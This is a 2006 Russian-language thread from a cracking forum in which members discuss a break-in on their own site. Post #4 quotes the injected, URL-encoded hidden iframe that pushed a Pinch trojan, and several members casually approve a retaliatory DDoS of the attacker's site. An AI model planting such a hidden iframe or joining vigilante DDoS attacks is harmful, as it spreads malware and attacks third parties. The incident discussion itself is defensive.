| Сейчас на форуме: kris_sexy, ==DJ==[ZLO] (+6 невидимых) |
 |
eXeL@B —› Крэки, обсуждения —› Видео взлома CRACKL@B (Кто сломал сайт ?) |
| << . 1 . 2 . 3 . 4 . >> |
| Посл.ответ | Сообщение |
|
|
Создано: 15 августа 2006 00:20 · Поправил: Bad_guy · Личное сообщение · #1 Сегодня кто-то сломал сайт. Шелл был загружен (этим все сказано), пока что логи мне не подсказали как это было сделано. --- От 20 августа: Видео(тутор) дружественного взлома CRACKL@B (SanyaX): rapidshare.de/files/30130736/cracklab_is_fucked.rar.html Дырки уже заделаны, но из видео узнаете как можно сломать IPB форумы. Дырки уже заделаны, но из видео узнаете как можно сломать IPB форумы. ----- Всем не угодишь  |
|
|
Создано: 15 августа 2006 21:37 · Поправил: Z0oMiK · Личное сообщение · #2 [i]Bad_guy пишет: www.forum.antichat.ru/showthread.php?s=06b930a28f7a24d4dd4a9ca6 7d862649&p=182922#post182922 Del 
|
|
|
Создано: 15 августа 2006 22:02 · Поправил: little_CHE · Личное сообщение · #3 зумег аkа фотоапаратег пишет: Ну ваще блин писец ... скрывается ведьма и не гавари 
ой уссусь чичас зумег, опять жжешь, вернись в фотоапаратег |
|
|
Создано: 15 августа 2006 22:34 · Личное сообщение · #4 Сейчас опять на форуме был поставлен ифрэйм вот такой вот: <html><iframe src=http://%77%77%77%2e%35%74%76%2e%72%75./images/avatars/pic/ frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe></html></span></td> эксплоит скачивает троян, троян пойман похоже это пинч (рассматриваю его не я). ----- Всем не угодишь |
|
|
Создано: 15 августа 2006 22:38 · Личное сообщение · #5 можете тоже скачать поглядеть. Что-то мне на античате не зарегиться (письмо не проходит), у кого есть логин отпишитесь там - пусть спецы помогут с залатыванием дырок, а то по дурацки получается... ----- Всем не угодишь |
|
|
Создано: 16 августа 2006 00:27 · Личное сообщение · #6 5tv.ru походу тоже сломан. |
|
|
Создано: 16 августа 2006 01:06 · Личное сообщение · #7 А также не так давно ломали форум старфорса, после чего его вообще закрыли 
----- Research is my purpose |
|
|
Создано: 16 августа 2006 03:00 · Личное сообщение · #8 отписался на а4ате, завтра, думаю, все решим ----- HOW MUCH BLOOD WOULD YOU SHED TO STAY ALIVE |
|
|
Создано: 16 августа 2006 05:54 · Поправил: intty · Личное сообщение · #9 Bad_guy: выложи, пожалуйста, зверушку. посмотреть, поковырять. а то на 5tv похоже уже все пофиксили. |
|
|
Создано: 16 августа 2006 14:22 · Личное сообщение · #10 Bad_guy пишет: Сейчас опять на форуме был поставлен ифрэйм благо в опере можно отключить обработку iframe |
|
|
Создано: 16 августа 2006 15:27 · Личное сообщение · #11 intty Да там обычный пинч как оказалось, вчера парни с ним разобрались и сайт хакера задосили. ----- Всем не угодишь |
|
|
Создано: 16 августа 2006 15:36 · Личное сообщение · #12 Bad_guyBad_guy пишет: сайт хакера задосили И какой адрес сайта интересно |
|
|
Создано: 16 августа 2006 15:46 · Личное сообщение · #13 d3m0n.org ----- Всем не угодишь |
|
|
Создано: 16 августа 2006 15:49 · Личное сообщение · #14 ы.. базу ёбнули.. пиздос ст0тьям.. |
|
|
Создано: 16 августа 2006 16:00 · Личное сообщение · #15 specz пишет: ы.. базу ёбнули.. пиздос ст0тьям.. Не смешно... ----- Сколько ни наталкивали на мысль – все равно сумел увернуться |
|
|
Создано: 16 августа 2006 16:11 · Личное сообщение · #16 база по любому забэкаплена. ----- Всем не угодишь |
|
|
Создано: 16 августа 2006 21:01 · Личное сообщение · #17 А чо на ачате тока хакеры сидят? Ну вон, спросите у Proteusa, он там часто бывает. И зайдите на www.security.nnov.ru/ , пробейте новые уязвимости. Потому как я среди старых дыр, кроме как ВВ - коды+ява, ничо придумать не могу. И как вообще ломанули? Шелл под кем был запущен? Откуда взялся? Или простой дефейс ? Поменяли индекс на свой? Если так, то 100% - вв-коды+ява. Надо проверить - через двадцать секунд запускаю сканер, посмотрим, чо он покажет. Не примите за атаку. 
|
|
|
Создано: 16 августа 2006 21:10 · Личное сообщение · #18 Bad_guy пишет: Да там обычный пинч как оказалось, вчера парни с ним разобрались и сайт хакера задосили. а, понятно. тогда конечно не интересно. другое дело редкие звери ) |
|
|
Создано: 16 августа 2006 21:35 · Личное сообщение · #19 Дааа. Список багов сайта ушел в личку БГ. Сюда даж стыдно выложить. И это стандарты. А если проявить фантазию... Я удивляюсь, что раньше не ломанули. |
|
|
Создано: 16 августа 2006 21:46 · Личное сообщение · #20 stahh пишет: через двадцать секунд запускаю сканер Что за сканер? Если можно в личку. |
|
|
Создано: 16 августа 2006 21:49 · Личное сообщение · #21 ХМ.... Странно, КТО бы это мог быть. 
----- Харе курить веники и нюхать клей, к вам едет из Америки бог Шива, и он еврей. |
|
|
Создано: 17 августа 2006 00:46 · Личное сообщение · #22 stahh Я так и не понял кто с тем логом в руках и как что-то сломает - это просто лог страниц 404 и редиректов. И сломали я вам хочу сказать хостера, теперь это уже ясно на 100%. ----- Всем не угодишь |
|
|
Создано: 17 августа 2006 11:16 · Личное сообщение · #23 Bad_guy Хостера? А как? И чо за хостер, если его ломанул чайник со своего реального айпи? Или все не так было. Тот лог, что я отослал в личку - тебе ничо не скажет. Это лог, который я вырезал из проги. Там половины не видно, тока названия уязвимостей. Но сам сканер показывает гораздо больше. Например, какие параметры надо передать скрипту  Ну и если с хаком знаком, то можно даже трейсом сломать. Скажем с параметрами буфероверфлоу для какого-нить софта. Ну это не важно. Раз хостера ломанули.
У мню инет - совсем гавно. А так, я б попробовал сломать креклаб, чтоб потестить. А тот скрипт, что я писал - это в любом случае дыра. А если хостера ломанули, то скорей всего из соседнего ака. Сломать влоб, со сторону - это ооочень тяжко. Так что пусть смотрят свою клиентуру. SLAVHOST - это не Агава, кому попало вроде не раздают аки. Попроси кого-нить, чтоб потестили сайт. На ачате есть знающие люди. Или Red Baron может посоветовать. |
|
|
Создано: 17 августа 2006 11:18 · Поправил: stahh · Личное сообщение · #24 Удалено |
|
|
Создано: 17 августа 2006 11:52 · Личное сообщение · #25 2stahh >>Хостера? А как? И чо за хостер, если его ломанул чайник со своего реального айпи? Или все не так было. было 2 последовательных взлома: 1 - 4айника со своего реального питеского айпи и установки ифрейма на мейн 2 - дружественный взлом а4ата - ждите видео ;) ----- HOW MUCH BLOOD WOULD YOU SHED TO STAY ALIVE |
|
|
Создано: 17 августа 2006 12:56 · Личное сообщение · #26 первого неплохо было бы поиметь, хотя бы хостеру. ЗЫ: и почини все-таки букву Ч =)) |
|
|
Создано: 17 августа 2006 13:15 · Личное сообщение · #27 Ara я в канал же скидывал данные кто такой, мыльники, аси, ник, сайт тимы. хостер его акк уже блокнул, куда сливал инфу пинч. |
|
|
Создано: 17 августа 2006 13:21 · Личное сообщение · #28 2Ara, ты мне это уже 3 раз гришь, ну привык я =) ----- HOW MUCH BLOOD WOULD YOU SHED TO STAY ALIVE |
|
|
Создано: 17 августа 2006 13:32 · Личное сообщение · #29 Paxan Этого мало, а инфа возможно левая. Или он совлем лопух тупой. |
|
|
Создано: 17 августа 2006 13:35 · Поправил: bg · Личное сообщение · #30 Вообщем ошибка сообщена администратору. Её будут устранять. Если кто хочёт узнать уязвимость. Будет сделано видео, но будет опубликовано после устранения ошибки. |
|
|
Создано: 17 августа 2006 13:37 · Личное сообщение · #31 Гы, Администратор-нарушитель форума. Мож ты другой ник зарегаешь? |
| << . 1 . 2 . 3 . 4 . >> |
|
eXeL@B —› Крэки, обсуждения —› Видео взлома CRACKL@B (Кто сломал сайт ?) |
| Эта тема закрыта. Ответы больше не принимаются. |
Для печати